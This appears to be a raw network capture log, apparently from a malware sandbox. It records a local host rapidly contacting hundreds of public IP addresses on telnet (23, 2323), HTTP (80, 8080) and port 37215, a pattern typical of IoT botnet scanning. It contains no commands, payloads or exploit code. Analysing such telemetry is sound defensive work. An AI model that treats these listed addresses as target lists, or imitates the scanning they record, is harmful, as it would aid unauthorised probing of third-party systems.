Nov 22, 2023 08:37:49.437067032 CET	54320	23	192.168.2.23	177.202.164.246
Nov 22, 2023 08:37:49.593020916 CET	8080	54329	31.136.219.234	192.168.2.23
Nov 22, 2023 08:37:49.593302965 CET	54329	8080	192.168.2.23	31.136.219.234
Nov 22, 2023 08:37:49.595503092 CET	8080	54329	62.27.60.89	192.168.2.23
Nov 22, 2023 08:37:49.599375963 CET	8080	54329	62.97.202.47	192.168.2.23
Nov 22, 2023 08:37:49.603322029 CET	8080	54329	62.113.230.74	192.168.2.23
Nov 22, 2023 08:37:49.603388071 CET	54329	8080	192.168.2.23	62.113.230.74
Nov 22, 2023 08:37:49.604701996 CET	8080	54329	85.93.241.8	192.168.2.23
Nov 22, 2023 08:37:49.605221033 CET	8080	54329	62.117.209.62	192.168.2.23
Nov 22, 2023 08:37:49.616632938 CET	80	54328	95.217.85.34	192.168.2.23
Nov 22, 2023 08:37:49.616692066 CET	54328	80	192.168.2.23	95.217.85.34
Nov 22, 2023 08:37:49.617849112 CET	8080	54329	31.46.17.176	192.168.2.23
Nov 22, 2023 08:37:49.618415117 CET	8080	54329	95.247.222.182	192.168.2.23
Nov 22, 2023 08:37:49.619829893 CET	8080	54329	94.127.32.97	192.168.2.23
Nov 22, 2023 08:37:49.624123096 CET	80	54328	95.235.236.4	192.168.2.23
Nov 22, 2023 08:37:49.626291037 CET	80	54328	95.107.233.10	192.168.2.23
Nov 22, 2023 08:37:49.626332045 CET	54328	80	192.168.2.23	95.107.233.10
Nov 22, 2023 08:37:49.627074957 CET	8080	54329	62.162.161.33	192.168.2.23
Nov 22, 2023 08:37:49.627933025 CET	80	54328	95.110.132.243	192.168.2.23
Nov 22, 2023 08:37:49.628078938 CET	54328	80	192.168.2.23	95.110.132.243
Nov 22, 2023 08:37:49.633187056 CET	80	54328	95.156.131.175	192.168.2.23
Nov 22, 2023 08:37:49.639892101 CET	8080	54329	85.234.36.155	192.168.2.23
Nov 22, 2023 08:37:49.640423059 CET	8080	54329	95.83.107.197	192.168.2.23
Nov 22, 2023 08:37:49.648590088 CET	80	54328	95.161.194.77	192.168.2.23
Nov 22, 2023 08:37:49.654208899 CET	8080	54329	31.145.74.34	192.168.2.23
Nov 22, 2023 08:37:49.654295921 CET	8080	54329	94.232.190.113	192.168.2.23
Nov 22, 2023 08:37:49.657147884 CET	8080	54329	94.43.54.149	192.168.2.23
Nov 22, 2023 08:37:49.657557964 CET	23	54320	194.236.15.149	192.168.2.23
Nov 22, 2023 08:37:49.681711912 CET	37215	54335	197.13.204.175	192.168.2.23
Nov 22, 2023 08:37:49.701868057 CET	2323	54320	60.155.246.82	192.168.2.23
Nov 22, 2023 08:37:49.716439009 CET	23	54320	61.82.215.186	192.168.2.23
Nov 22, 2023 08:37:49.737839937 CET	23	54320	59.8.58.12	192.168.2.23
Nov 22, 2023 08:37:49.756423950 CET	8080	54329	94.40.88.229	192.168.2.23
Nov 22, 2023 08:37:49.764440060 CET	80	54328	95.240.199.181	192.168.2.23
Nov 22, 2023 08:37:49.770483971 CET	2323	54320	103.104.168.231	192.168.2.23
Nov 22, 2023 08:37:49.776262045 CET	37215	54335	197.232.154.174	192.168.2.23
Nov 22, 2023 08:37:49.780011892 CET	37215	54335	197.232.135.71	192.168.2.23
Nov 22, 2023 08:37:49.804090023 CET	23	54320	197.214.190.24	192.168.2.23
Nov 22, 2023 08:37:49.814378023 CET	23	54320	122.255.14.112	192.168.2.23
Nov 22, 2023 08:37:49.824009895 CET	23	54320	41.174.102.128	192.168.2.23
Nov 22, 2023 08:37:49.888828039 CET	37215	54335	197.9.133.42	192.168.2.23
Nov 22, 2023 08:37:50.228028059 CET	43928	443	192.168.2.23	91.189.91.42
Nov 22, 2023 08:37:50.286465883 CET	8080	54329	95.202.76.185	192.168.2.23
Nov 22, 2023 08:37:50.412226915 CET	54329	8080	192.168.2.23	94.147.55.7
Nov 22, 2023 08:37:50.412251949 CET	54329	8080	192.168.2.23	31.97.209.31
Nov 22, 2023 08:37:50.412265062 CET	54329	8080	192.168.2.23	95.250.171.3
Nov 22, 2023 08:37:50.412265062 CET	54329	8080	192.168.2.23	62.41.11.234
Nov 22, 2023 08:37:50.412311077 CET	54329	8080	192.168.2.23	85.117.149.196
Nov 22, 2023 08:37:50.412323952 CET	54329	8080	192.168.2.23	62.194.73.156
Nov 22, 2023 08:37:50.412323952 CET	54329	8080	192.168.2.23	94.50.199.70
Nov 22, 2023 08:37:50.412333965 CET	54329	8080	192.168.2.23	62.140.171.222
Nov 22, 2023 08:37:50.412333965 CET	54329	8080	192.168.2.23	94.150.236.243
Nov 22, 2023 08:37:50.412333965 CET	54329	8080	192.168.2.23	85.212.43.175
Nov 22, 2023 08:37:50.412333965 CET	54329	8080	192.168.2.23	62.53.88.232
Nov 22, 2023 08:37:50.412334919 CET	54329	8080	192.168.2.23	31.234.92.228
Nov 22, 2023 08:37:50.412348032 CET	54329	8080	192.168.2.23	94.185.115.33
Nov 22, 2023 08:37:50.412350893 CET	54329	8080	192.168.2.23	95.152.51.145
Nov 22, 2023 08:37:50.412350893 CET	54329	8080	192.168.2.23	31.156.142.207
Nov 22, 2023 08:37:50.412353039 CET	54329	8080	192.168.2.23	95.97.211.134
Nov 22, 2023 08:37:50.412365913 CET	54329	8080	192.168.2.23	85.224.141.82
Nov 22, 2023 08:37:50.412370920 CET	54329	8080	192.168.2.23	94.220.186.12
Nov 22, 2023 08:37:50.412375927 CET	54329	8080	192.168.2.23	62.34.134.28
Nov 22, 2023 08:37:50.412378073 CET	54329	8080	192.168.2.23	62.82.235.39
Nov 22, 2023 08:37:50.412381887 CET	54329	8080	192.168.2.23	31.122.147.150
Nov 22, 2023 08:37:50.412379026 CET	54329	8080	192.168.2.23	85.228.4.221
Nov 22, 2023 08:37:50.412379026 CET	54329	8080	192.168.2.23	95.2.48.221
Nov 22, 2023 08:37:50.412379026 CET	54329	8080	192.168.2.23	31.157.68.97
Nov 22, 2023 08:37:50.412379026 CET	54329	8080	192.168.2.23	31.193.22.233
Nov 22, 2023 08:37:50.412389040 CET	54329	8080	192.168.2.23	94.221.42.25
Nov 22, 2023 08:37:50.412393093 CET	54329	8080	192.168.2.23	94.113.106.190
Nov 22, 2023 08:37:50.412400007 CET	54329	8080	192.168.2.23	62.218.193.122
Nov 22, 2023 08:37:50.412412882 CET	54329	8080	192.168.2.23	31.215.72.86
Nov 22, 2023 08:37:50.412422895 CET	54329	8080	192.168.2.23	85.79.191.225
Nov 22, 2023 08:37:50.412429094 CET	54329	8080	192.168.2.23	31.26.209.66
Nov 22, 2023 08:37:50.412431955 CET	54329	8080	192.168.2.23	85.93.107.8
Nov 22, 2023 08:37:50.412432909 CET	54329	8080	192.168.2.23	95.85.55.82
Nov 22, 2023 08:37:50.412436962 CET	54329	8080	192.168.2.23	85.250.198.215
Nov 22, 2023 08:37:50.412447929 CET	54329	8080	192.168.2.23	95.152.155.7
Nov 22, 2023 08:37:50.412448883 CET	54329	8080	192.168.2.23	85.170.206.137
Nov 22, 2023 08:37:50.412467957 CET	54329	8080	192.168.2.23	85.9.137.71
Nov 22, 2023 08:37:50.412468910 CET	54329	8080	192.168.2.23	95.13.104.59
Nov 22, 2023 08:37:50.412486076 CET	54329	8080	192.168.2.23	95.123.152.25
Nov 22, 2023 08:37:50.412487030 CET	54329	8080	192.168.2.23	62.254.121.222
Nov 22, 2023 08:37:50.412491083 CET	54329	8080	192.168.2.23	62.49.254.82
Nov 22, 2023 08:37:50.412496090 CET	54329	8080	192.168.2.23	94.220.44.235
Nov 22, 2023 08:37:50.412508965 CET	54329	8080	192.168.2.23	85.76.33.18
Nov 22, 2023 08:37:50.412511110 CET	54329	8080	192.168.2.23	85.106.154.10
Nov 22, 2023 08:37:50.412523985 CET	54329	8080	192.168.2.23	85.177.237.43
Nov 22, 2023 08:37:50.412525892 CET	54329	8080	192.168.2.23	85.16.85.56
Nov 22, 2023 08:37:50.412527084 CET	54329	8080	192.168.2.23	62.111.48.184
Nov 22, 2023 08:37:50.412527084 CET	54329	8080	192.168.2.23	62.171.86.204
Nov 22, 2023 08:37:50.412533045 CET	54329	8080	192.168.2.23	62.48.1.117
Nov 22, 2023 08:37:50.412533045 CET	54329	8080	192.168.2.23	85.1.168.212
Nov 22, 2023 08:37:50.412544966 CET	54329	8080	192.168.2.23	95.210.250.14
Nov 22, 2023 08:37:50.412568092 CET	54329	8080	192.168.2.23	85.167.136.208
Nov 22, 2023 08:37:50.412568092 CET	54329	8080	192.168.2.23	85.24.3.169
Nov 22, 2023 08:37:50.412570000 CET	54329	8080	192.168.2.23	94.125.109.150
Nov 22, 2023 08:37:50.412570953 CET	54329	8080	192.168.2.23	94.170.56.227
Nov 22, 2023 08:37:50.412575006 CET	54329	8080	192.168.2.23	94.86.60.211
Nov 22, 2023 08:37:50.412590981 CET	54329	8080	192.168.2.23	94.16.128.94
Nov 22, 2023 08:37:50.412590981 CET	54329	8080	192.168.2.23	62.240.164.41
Nov 22, 2023 08:37:50.412595034 CET	54329	8080	192.168.2.23	94.181.47.73
Nov 22, 2023 08:37:50.412606001 CET	54329	8080	192.168.2.23	62.183.187.254
Nov 22, 2023 08:37:50.412610054 CET	54329	8080	192.168.2.23	94.32.45.98
Nov 22, 2023 08:37:50.412621975 CET	54329	8080	192.168.2.23	31.237.225.161
Nov 22, 2023 08:37:50.412625074 CET	54329	8080	192.168.2.23	95.126.134.153
Nov 22, 2023 08:37:50.412625074 CET	54329	8080	192.168.2.23	95.111.203.50
Nov 22, 2023 08:37:50.412636995 CET	54329	8080	192.168.2.23	85.20.101.23
Nov 22, 2023 08:37:50.412645102 CET	54329	8080	192.168.2.23	85.79.44.173
Nov 22, 2023 08:37:50.412650108 CET	54329	8080	192.168.2.23	95.252.106.148
Nov 22, 2023 08:37:50.412653923 CET	54329	8080	192.168.2.23	95.207.158.145
Nov 22, 2023 08:37:50.412658930 CET	54329	8080	192.168.2.23	85.208.237.153
Nov 22, 2023 08:37:50.412672997 CET	54329	8080	192.168.2.23	85.134.145.234
Nov 22, 2023 08:37:50.412686110 CET	54329	8080	192.168.2.23	62.161.168.8
Nov 22, 2023 08:37:50.412687063 CET	54329	8080	192.168.2.23	85.57.247.153
Nov 22, 2023 08:37:50.412687063 CET	54329	8080	192.168.2.23	31.251.80.50
Nov 22, 2023 08:37:50.412698030 CET	54329	8080	192.168.2.23	31.150.254.136
Nov 22, 2023 08:37:50.412704945 CET	54329	8080	192.168.2.23	94.53.26.70
Nov 22, 2023 08:37:50.412704945 CET	54329	8080	192.168.2.23	62.139.48.181
Nov 22, 2023 08:37:50.412717104 CET	54329	8080	192.168.2.23	31.76.177.219
Nov 22, 2023 08:37:50.412724018 CET	54329	8080	192.168.2.23	85.125.244.69
Nov 22, 2023 08:37:50.412724018 CET	54329	8080	192.168.2.23	31.231.207.143
Nov 22, 2023 08:37:50.412736893 CET	54329	8080	192.168.2.23	94.238.192.87
Nov 22, 2023 08:37:50.412739992 CET	54329	8080	192.168.2.23	94.251.97.25
Nov 22, 2023 08:37:50.412740946 CET	54329	8080	192.168.2.23	94.219.219.204
Nov 22, 2023 08:37:50.412755966 CET	54329	8080	192.168.2.23	94.235.68.44
Nov 22, 2023 08:37:50.412760973 CET	54329	8080	192.168.2.23	31.43.81.184
Nov 22, 2023 08:37:50.412770987 CET	54329	8080	192.168.2.23	85.82.13.193
Nov 22, 2023 08:37:50.412772894 CET	54329	8080	192.168.2.23	31.92.206.81
Nov 22, 2023 08:37:50.412786007 CET	54329	8080	192.168.2.23	62.116.113.27
Nov 22, 2023 08:37:50.412787914 CET	54329	8080	192.168.2.23	31.216.107.54
Nov 22, 2023 08:37:50.412792921 CET	54329	8080	192.168.2.23	95.127.251.92
Nov 22, 2023 08:37:50.412796021 CET	54329	8080	192.168.2.23	62.60.84.6
Nov 22, 2023 08:37:50.412811041 CET	54329	8080	192.168.2.23	94.0.239.210
Nov 22, 2023 08:37:50.412812948 CET	54329	8080	192.168.2.23	31.240.206.67
Nov 22, 2023 08:37:50.412812948 CET	54329	8080	192.168.2.23	95.58.57.136
Nov 22, 2023 08:37:50.412813902 CET	54329	8080	192.168.2.23	31.169.78.34
Nov 22, 2023 08:37:50.412816048 CET	54329	8080	192.168.2.23	31.230.244.101
Nov 22, 2023 08:37:50.412817001 CET	54329	8080	192.168.2.23	95.70.104.85
Nov 22, 2023 08:37:50.412822962 CET	54329	8080	192.168.2.23	85.229.195.107
Nov 22, 2023 08:37:50.412836075 CET	54329	8080	192.168.2.23	62.80.192.217
Nov 22, 2023 08:37:50.412837029 CET	54329	8080	192.168.2.23	95.109.64.238
Nov 22, 2023 08:37:50.412837029 CET	54329	8080	192.168.2.23	95.131.59.167
Nov 22, 2023 08:37:50.412853956 CET	54329	8080	192.168.2.23	94.87.157.15
Nov 22, 2023 08:37:50.412853956 CET	54329	8080	192.168.2.23	85.38.59.40
Nov 22, 2023 08:37:50.412858009 CET	54329	8080	192.168.2.23	85.73.176.225
Nov 22, 2023 08:37:50.412861109 CET	54329	8080	192.168.2.23	31.225.42.216
Nov 22, 2023 08:37:50.412875891 CET	54329	8080	192.168.2.23	85.76.119.225
Nov 22, 2023 08:37:50.412879944 CET	54329	8080	192.168.2.23	31.168.246.8
Nov 22, 2023 08:37:50.412888050 CET	54329	8080	192.168.2.23	62.167.117.157
Nov 22, 2023 08:37:50.412894011 CET	54329	8080	192.168.2.23	94.5.33.99
Nov 22, 2023 08:37:50.412894011 CET	54329	8080	192.168.2.23	31.190.217.78
Nov 22, 2023 08:37:50.412894964 CET	54329	8080	192.168.2.23	95.65.226.178
Nov 22, 2023 08:37:50.412913084 CET	54329	8080	192.168.2.23	95.200.185.60
Nov 22, 2023 08:37:50.412913084 CET	54329	8080	192.168.2.23	94.218.48.209
Nov 22, 2023 08:37:50.412926912 CET	54329	8080	192.168.2.23	85.32.9.18
Nov 22, 2023 08:37:50.412930012 CET	54329	8080	192.168.2.23	31.146.21.106
Nov 22, 2023 08:37:50.412930965 CET	54329	8080	192.168.2.23	94.164.91.225
Nov 22, 2023 08:37:50.412945032 CET	54329	8080	192.168.2.23	31.153.23.145
Nov 22, 2023 08:37:50.412946939 CET	54329	8080	192.168.2.23	62.122.172.181
Nov 22, 2023 08:37:50.412946939 CET	54329	8080	192.168.2.23	95.108.17.185
Nov 22, 2023 08:37:50.412964106 CET	54329	8080	192.168.2.23	31.68.174.183
Nov 22, 2023 08:37:50.412970066 CET	54329	8080	192.168.2.23	95.120.122.29
Nov 22, 2023 08:37:50.412980080 CET	54329	8080	192.168.2.23	95.40.180.149
Nov 22, 2023 08:37:50.412986040 CET	54329	8080	192.168.2.23	31.181.209.33
Nov 22, 2023 08:37:50.413002014 CET	54329	8080	192.168.2.23	95.111.69.109
Nov 22, 2023 08:37:50.413006067 CET	54329	8080	192.168.2.23	95.102.180.16
Nov 22, 2023 08:37:50.413006067 CET	54329	8080	192.168.2.23	62.26.254.63
Nov 22, 2023 08:37:50.413008928 CET	54329	8080	192.168.2.23	62.33.48.15
Nov 22, 2023 08:37:50.413022041 CET	54329	8080	192.168.2.23	62.46.253.162
Nov 22, 2023 08:37:50.413023949 CET	54329	8080	192.168.2.23	94.105.233.164
Nov 22, 2023 08:37:50.413032055 CET	54329	8080	192.168.2.23	85.144.3.87
Nov 22, 2023 08:37:50.413038969 CET	54329	8080	192.168.2.23	62.166.104.92
Nov 22, 2023 08:37:50.413041115 CET	54329	8080	192.168.2.23	85.103.85.54
Nov 22, 2023 08:37:50.413043976 CET	54329	8080	192.168.2.23	62.88.242.136
Nov 22, 2023 08:37:50.413064003 CET	54329	8080	192.168.2.23	94.70.203.187
Nov 22, 2023 08:37:50.413064957 CET	54329	8080	192.168.2.23	94.174.234.191
Nov 22, 2023 08:37:50.413064003 CET	54329	8080	192.168.2.23	85.243.51.119
Nov 22, 2023 08:37:50.413064957 CET	54329	8080	192.168.2.23	85.30.199.36
Nov 22, 2023 08:37:50.413080931 CET	54329	8080	192.168.2.23	85.193.213.5
Nov 22, 2023 08:37:50.413083076 CET	54329	8080	192.168.2.23	95.24.126.146
Nov 22, 2023 08:37:50.413083076 CET	54329	8080	192.168.2.23	62.26.229.77
Nov 22, 2023 08:37:50.413096905 CET	54329	8080	192.168.2.23	31.52.9.214
Nov 22, 2023 08:37:50.413096905 CET	54329	8080	192.168.2.23	85.160.251.228
Nov 22, 2023 08:37:50.413103104 CET	54329	8080	192.168.2.23	62.129.4.4
Nov 22, 2023 08:37:50.413103104 CET	54329	8080	192.168.2.23	94.126.175.135
Nov 22, 2023 08:37:50.413117886 CET	54329	8080	192.168.2.23	95.233.217.65
Nov 22, 2023 08:37:50.413119078 CET	54329	8080	192.168.2.23	85.68.142.86
Nov 22, 2023 08:37:50.413130045 CET	54329	8080	192.168.2.23	31.74.115.72
Nov 22, 2023 08:37:50.413134098 CET	54329	8080	192.168.2.23	85.178.20.163
Nov 22, 2023 08:37:50.413142920 CET	54329	8080	192.168.2.23	31.16.81.176
Nov 22, 2023 08:37:50.413147926 CET	54329	8080	192.168.2.23	62.79.116.202
Nov 22, 2023 08:37:50.413155079 CET	54329	8080	192.168.2.23	85.113.197.193
Nov 22, 2023 08:37:50.413172007 CET	54329	8080	192.168.2.23	94.238.153.128
Nov 22, 2023 08:37:50.413173914 CET	54329	8080	192.168.2.23	85.137.55.236
Nov 22, 2023 08:37:50.413182974 CET	54329	8080	192.168.2.23	95.208.235.183
Nov 22, 2023 08:37:50.413182974 CET	54329	8080	192.168.2.23	95.174.186.108
Nov 22, 2023 08:37:50.413182974 CET	54329	8080	192.168.2.23	85.125.172.32
Nov 22, 2023 08:37:50.413184881 CET	54329	8080	192.168.2.23	95.204.228.34
Nov 22, 2023 08:37:50.413206100 CET	54329	8080	192.168.2.23	62.175.170.250
Nov 22, 2023 08:37:50.413206100 CET	54329	8080	192.168.2.23	62.255.198.233
Nov 22, 2023 08:37:50.413208961 CET	54329	8080	192.168.2.23	94.204.73.161
Nov 22, 2023 08:37:50.413208961 CET	54329	8080	192.168.2.23	94.237.25.41
Nov 22, 2023 08:37:50.413214922 CET	54329	8080	192.168.2.23	85.78.63.72
Nov 22, 2023 08:37:50.413233042 CET	54329	8080	192.168.2.23	62.169.218.176
Nov 22, 2023 08:37:50.413235903 CET	54329	8080	192.168.2.23	62.164.160.39
Nov 22, 2023 08:37:50.413253069 CET	54329	8080	192.168.2.23	62.32.25.115
Nov 22, 2023 08:37:50.413255930 CET	54329	8080	192.168.2.23	85.42.28.100
Nov 22, 2023 08:37:50.413258076 CET	54329	8080	192.168.2.23	31.232.98.253
Nov 22, 2023 08:37:50.413274050 CET	54329	8080	192.168.2.23	94.204.246.58
Nov 22, 2023 08:37:50.413274050 CET	54329	8080	192.168.2.23	85.65.147.237
Nov 22, 2023 08:37:50.413275957 CET	54329	8080	192.168.2.23	62.166.154.106
Nov 22, 2023 08:37:50.413278103 CET	54329	8080	192.168.2.23	95.182.235.201
Nov 22, 2023 08:37:50.413289070 CET	54329	8080	192.168.2.23	94.92.238.122
Nov 22, 2023 08:37:50.413289070 CET	54329	8080	192.168.2.23	94.139.127.102
Nov 22, 2023 08:37:50.413290977 CET	54329	8080	192.168.2.23	31.67.157.92
Nov 22, 2023 08:37:50.413304090 CET	54329	8080	192.168.2.23	94.248.230.161
Nov 22, 2023 08:37:50.413305998 CET	54329	8080	192.168.2.23	95.35.28.177
Nov 22, 2023 08:37:50.413310051 CET	54329	8080	192.168.2.23	95.69.73.245
Nov 22, 2023 08:37:50.413322926 CET	54329	8080	192.168.2.23	94.150.167.241
Nov 22, 2023 08:37:50.413322926 CET	54329	8080	192.168.2.23	94.75.211.231
Nov 22, 2023 08:37:50.413325071 CET	54329	8080	192.168.2.23	94.107.110.38
Nov 22, 2023 08:37:50.413337946 CET	54329	8080	192.168.2.23	62.239.132.65
Nov 22, 2023 08:37:50.413341045 CET	54329	8080	192.168.2.23	62.210.127.199
Nov 22, 2023 08:37:50.413355112 CET	54329	8080	192.168.2.23	31.178.53.128
Nov 22, 2023 08:37:50.413356066 CET	54329	8080	192.168.2.23	95.128.95.193
Nov 22, 2023 08:37:50.413357973 CET	54329	8080	192.168.2.23	85.179.176.87
Nov 22, 2023 08:37:50.413378000 CET	54329	8080	192.168.2.23	94.65.120.193
Nov 22, 2023 08:37:50.413384914 CET	54329	8080	192.168.2.23	95.152.90.157
Nov 22, 2023 08:37:50.413393021 CET	54329	8080	192.168.2.23	94.51.83.162
Nov 22, 2023 08:37:50.413403034 CET	54329	8080	192.168.2.23	95.221.125.129
Nov 22, 2023 08:37:50.413415909 CET	54329	8080	192.168.2.23	62.245.153.186
Nov 22, 2023 08:37:50.413419962 CET	54329	8080	192.168.2.23	94.242.0.73
Nov 22, 2023 08:37:50.413427114 CET	54329	8080	192.168.2.23	95.197.187.230
Nov 22, 2023 08:37:50.413438082 CET	54329	8080	192.168.2.23	94.41.63.165
Nov 22, 2023 08:37:50.413438082 CET	54329	8080	192.168.2.23	62.120.115.177
Nov 22, 2023 08:37:50.413438082 CET	54329	8080	192.168.2.23	62.86.172.19
Nov 22, 2023 08:37:50.413456917 CET	54329	8080	192.168.2.23	85.193.160.55
Nov 22, 2023 08:37:50.413458109 CET	54329	8080	192.168.2.23	94.40.149.27
Nov 22, 2023 08:37:50.413466930 CET	54329	8080	192.168.2.23	62.20.112.151
Nov 22, 2023 08:37:50.413471937 CET	54329	8080	192.168.2.23	62.239.157.41
Nov 22, 2023 08:37:50.413471937 CET	54329	8080	192.168.2.23	95.9.86.196
Nov 22, 2023 08:37:50.413471937 CET	54329	8080	192.168.2.23	94.84.78.94
Nov 22, 2023 08:37:50.413495064 CET	54329	8080	192.168.2.23	95.78.33.153
Nov 22, 2023 08:37:50.413495064 CET	54329	8080	192.168.2.23	31.182.147.68
Nov 22, 2023 08:37:50.413496971 CET	54329	8080	192.168.2.23	94.64.61.61
Nov 22, 2023 08:37:50.413496971 CET	54329	8080	192.168.2.23	62.50.0.7
Nov 22, 2023 08:37:50.413508892 CET	54329	8080	192.168.2.23	62.119.36.91
Nov 22, 2023 08:37:50.413515091 CET	54329	8080	192.168.2.23	94.103.121.193
Nov 22, 2023 08:37:50.413516998 CET	54329	8080	192.168.2.23	85.82.57.105
Nov 22, 2023 08:37:50.413530111 CET	54329	8080	192.168.2.23	62.205.219.100
Nov 22, 2023 08:37:50.413541079 CET	54329	8080	192.168.2.23	31.79.217.190
Nov 22, 2023 08:37:50.413542032 CET	54329	8080	192.168.2.23	85.246.28.220
Nov 22, 2023 08:37:50.413542986 CET	54329	8080	192.168.2.23	85.183.101.12
Nov 22, 2023 08:37:50.413558006 CET	54329	8080	192.168.2.23	94.11.77.203
Nov 22, 2023 08:37:50.413558960 CET	54329	8080	192.168.2.23	62.210.201.32
Nov 22, 2023 08:37:50.413573027 CET	54329	8080	192.168.2.23	85.51.146.69
Nov 22, 2023 08:37:50.413573027 CET	54329	8080	192.168.2.23	85.32.226.102
Nov 22, 2023 08:37:50.413573027 CET	54329	8080	192.168.2.23	95.246.178.158
Nov 22, 2023 08:37:50.413587093 CET	54329	8080	192.168.2.23	31.33.199.78
Nov 22, 2023 08:37:50.413587093 CET	54329	8080	192.168.2.23	94.174.63.124
Nov 22, 2023 08:37:50.413597107 CET	54329	8080	192.168.2.23	62.186.91.140
Nov 22, 2023 08:37:50.413605928 CET	54329	8080	192.168.2.23	95.5.20.220
Nov 22, 2023 08:37:50.413605928 CET	54329	8080	192.168.2.23	31.44.214.114
Nov 22, 2023 08:37:50.413618088 CET	54329	8080	192.168.2.23	62.73.10.61
Nov 22, 2023 08:37:50.413620949 CET	54329	8080	192.168.2.23	94.177.98.90
Nov 22, 2023 08:37:50.413635969 CET	54329	8080	192.168.2.23	85.168.102.174
Nov 22, 2023 08:37:50.413639069 CET	54329	8080	192.168.2.23	62.57.122.85
Nov 22, 2023 08:37:50.413650036 CET	54329	8080	192.168.2.23	95.252.140.252
Nov 22, 2023 08:37:50.413650036 CET	54329	8080	192.168.2.23	62.249.74.171
Nov 22, 2023 08:37:50.413654089 CET	54329	8080	192.168.2.23	94.218.22.13
Nov 22, 2023 08:37:50.413671970 CET	54329	8080	192.168.2.23	95.33.29.32
Nov 22, 2023 08:37:50.413671970 CET	54329	8080	192.168.2.23	62.177.193.181
Nov 22, 2023 08:37:50.413671970 CET	54329	8080	192.168.2.23	31.44.146.215
Nov 22, 2023 08:37:50.413685083 CET	54329	8080	192.168.2.23	94.209.207.94
Nov 22, 2023 08:37:50.413692951 CET	54329	8080	192.168.2.23	85.224.225.151
Nov 22, 2023 08:37:50.413705111 CET	54329	8080	192.168.2.23	62.82.217.113
Nov 22, 2023 08:37:50.413706064 CET	54329	8080	192.168.2.23	85.20.252.62
Nov 22, 2023 08:37:50.413719893 CET	54329	8080	192.168.2.23	94.55.74.90
Nov 22, 2023 08:37:50.413724899 CET	54329	8080	192.168.2.23	94.54.52.216
Nov 22, 2023 08:37:50.413738012 CET	54329	8080	192.168.2.23	94.207.195.232
Nov 22, 2023 08:37:50.413739920 CET	54329	8080	192.168.2.23	95.26.241.128
Nov 22, 2023 08:37:50.413753033 CET	54329	8080	192.168.2.23	85.145.76.222
Nov 22, 2023 08:37:50.413753033 CET	54329	8080	192.168.2.23	62.26.77.82
Nov 22, 2023 08:37:50.413768053 CET	54329	8080	192.168.2.23	94.152.88.133
Nov 22, 2023 08:37:50.413769007 CET	54329	8080	192.168.2.23	94.73.78.248
Nov 22, 2023 08:37:50.413777113 CET	54329	8080	192.168.2.23	85.116.18.200
Nov 22, 2023 08:37:50.413785934 CET	54329	8080	192.168.2.23	85.60.255.86
Nov 22, 2023 08:37:50.413798094 CET	54329	8080	192.168.2.23	62.24.176.7
Nov 22, 2023 08:37:50.413803101 CET	54329	8080	192.168.2.23	31.179.147.77
Nov 22, 2023 08:37:50.413810968 CET	54329	8080	192.168.2.23	85.55.87.139
Nov 22, 2023 08:37:50.413817883 CET	54329	8080	192.168.2.23	95.181.77.22
Nov 22, 2023 08:37:50.413827896 CET	54329	8080	192.168.2.23	94.236.10.224
Nov 22, 2023 08:37:50.413830042 CET	54329	8080	192.168.2.23	85.157.159.226
Nov 22, 2023 08:37:50.413831949 CET	54329	8080	192.168.2.23	62.197.205.15
Nov 22, 2023 08:37:50.413839102 CET	54329	8080	192.168.2.23	62.148.70.172
Nov 22, 2023 08:37:50.413853884 CET	54329	8080	192.168.2.23	94.149.145.185
Nov 22, 2023 08:37:50.413857937 CET	54329	8080	192.168.2.23	94.209.47.189
Nov 22, 2023 08:37:50.413858891 CET	54329	8080	192.168.2.23	85.26.207.227
Nov 22, 2023 08:37:50.413872004 CET	54329	8080	192.168.2.23	95.221.165.218
Nov 22, 2023 08:37:50.413876057 CET	54329	8080	192.168.2.23	31.19.21.131
Nov 22, 2023 08:37:50.413876057 CET	54329	8080	192.168.2.23	95.12.67.62
Nov 22, 2023 08:37:50.413885117 CET	54329	8080	192.168.2.23	62.93.121.144
Nov 22, 2023 08:37:50.413887978 CET	54329	8080	192.168.2.23	95.237.86.250
Nov 22, 2023 08:37:50.413897991 CET	54329	8080	192.168.2.23	94.221.152.182
Nov 22, 2023 08:37:50.413906097 CET	54329	8080	192.168.2.23	95.55.234.154
Nov 22, 2023 08:37:50.413908958 CET	54329	8080	192.168.2.23	85.27.71.96
Nov 22, 2023 08:37:50.413921118 CET	54329	8080	192.168.2.23	94.49.118.28
Nov 22, 2023 08:37:50.413980961 CET	54329	8080	192.168.2.23	62.202.247.8
Nov 22, 2023 08:37:50.413984060 CET	54329	8080	192.168.2.23	31.58.108.89
Nov 22, 2023 08:37:50.413990021 CET	54329	8080	192.168.2.23	31.91.97.222
Nov 22, 2023 08:37:50.414007902 CET	54329	8080	192.168.2.23	95.20.97.79
Nov 22, 2023 08:37:50.414009094 CET	54329	8080	192.168.2.23	94.158.66.25
Nov 22, 2023 08:37:50.414022923 CET	54329	8080	192.168.2.23	95.74.91.37
Nov 22, 2023 08:37:50.414022923 CET	54329	8080	192.168.2.23	85.138.31.34
Nov 22, 2023 08:37:50.414037943 CET	54329	8080	192.168.2.23	31.126.87.16
Nov 22, 2023 08:37:50.414041996 CET	54329	8080	192.168.2.23	95.35.17.209
Nov 22, 2023 08:37:50.414043903 CET	54329	8080	192.168.2.23	95.106.14.222
Nov 22, 2023 08:37:50.414058924 CET	54329	8080	192.168.2.23	85.128.227.243
Nov 22, 2023 08:37:50.414062023 CET	54329	8080	192.168.2.23	31.72.56.163
Nov 22, 2023 08:37:50.414071083 CET	54329	8080	192.168.2.23	31.112.175.136
Nov 22, 2023 08:37:50.414079905 CET	54329	8080	192.168.2.23	94.147.111.242
Nov 22, 2023 08:37:50.414083004 CET	54329	8080	192.168.2.23	94.104.72.123
Nov 22, 2023 08:37:50.414097071 CET	54329	8080	192.168.2.23	31.156.109.47
Nov 22, 2023 08:37:50.414102077 CET	54329	8080	192.168.2.23	85.123.36.74
Nov 22, 2023 08:37:50.414108038 CET	54329	8080	192.168.2.23	95.170.102.32
Nov 22, 2023 08:37:50.414119005 CET	54329	8080	192.168.2.23	94.125.147.58
Nov 22, 2023 08:37:50.414129019 CET	54329	8080	192.168.2.23	62.133.128.88
Nov 22, 2023 08:37:50.414136887 CET	54329	8080	192.168.2.23	31.66.243.2
Nov 22, 2023 08:37:50.414139986 CET	54329	8080	192.168.2.23	62.176.113.29
Nov 22, 2023 08:37:50.414144039 CET	54329	8080	192.168.2.23	94.45.138.116
Nov 22, 2023 08:37:50.414156914 CET	54329	8080	192.168.2.23	62.95.174.162
Nov 22, 2023 08:37:50.414158106 CET	54329	8080	192.168.2.23	62.190.182.203
